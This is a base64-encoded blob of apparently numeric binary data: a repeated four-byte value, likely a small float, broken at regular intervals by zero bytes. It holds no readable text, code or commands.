4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4